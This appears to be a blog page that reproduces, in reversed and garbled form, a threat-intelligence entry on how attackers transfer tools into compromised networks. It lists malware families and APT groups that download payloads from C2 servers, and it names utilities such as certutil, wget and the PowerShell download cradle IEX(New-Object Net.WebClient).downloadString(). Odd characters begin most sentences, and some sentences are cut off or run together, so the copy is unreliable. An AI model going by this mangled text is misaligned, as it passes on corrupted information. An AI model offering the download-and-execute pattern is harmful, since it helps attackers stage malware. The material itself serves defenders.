īisonal has the capability to download files to execute on the victim’s machine. īISCUIT has a command to download a file from the C2 server. īendyBear is designed to download an implant from a C2 server. īBK has the ability to download files from C2 to the infected host. īazar can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike. īankshot uploads files and secondary payloads to the victim's machine. īandook can download files to the system. īadPatch can download and execute or update malware. īADNEWS is capable of downloading additional files through C2 channels, including a new version of itself. īADHATCH has the ability to load a second stage malicious DLL file onto a compromised machine. īADFLICK has download files from its C2 server. īackdoorDiplomacy has downloaded additional files and tools onto a compromised host. īackdoor.Oldrea can download additional modules from C2. īackConfig can download and execute additional payloads on a compromised host. īabyShark has downloaded additional files from the C2. Azorult has also downloaded a ransomware payload called Hermes. Īzorult can download and execute additional files. Īvenger has the ability to download files from C2 to a compromised host. ĪuditCred can download files and additional malware. Īttor can download additional plugins, updates and other files. ĪsyncRAT has the ability to download files over SFTP. Īstaroth uses certutil and BITSAdmin to download additional malware. Īria-body has the ability to download additional payloads from C2. Īquatic Panda has downloaded additional malware onto compromised hosts. ĪPT41 used certutil to download additional files. ĪPT39 has downloaded tools to compromised hosts. ĪPT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine. ĪPT37 has downloaded second stage malware from compromised websites. ĪPT33 has downloaded additional files and programs from its C2 server. ĪPT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors. ĪPT3 has a tool that can copy files to remote machines. ĪPT29 has downloaded additional tools and malware onto compromised networks. ĪPT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant. ĪPT18 can upload a file to the victim’s machine. ĪPT-C-36 has downloaded binary data from a specified domain after the malicious document is opened. ĪNDROMEDA can download additional payloads from C2. Īndariel has downloaded additional tools and malware onto compromised hosts. Īmadey can download and execute files to further infect a host machine with additional malware. Ījax Security Team has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system. Īgent.btz attempts to download an encrypted binary from a specified domain. Īgent Tesla can download additional files for execution on the victim’s machine. Īction RAT has the ability to download additional payloads onto an infected machine. ĪBK has the ability to download files from C2. ĭuring the 2015 Ukraine Electric Power Attack, Sandworm Team pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine. In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. Īdversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts.įiles can also be transferred using various Web Services as well as native or otherwise present tools on the victim system. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget. On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Adversaries may transfer tools or other files from an external system into a compromised environment.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |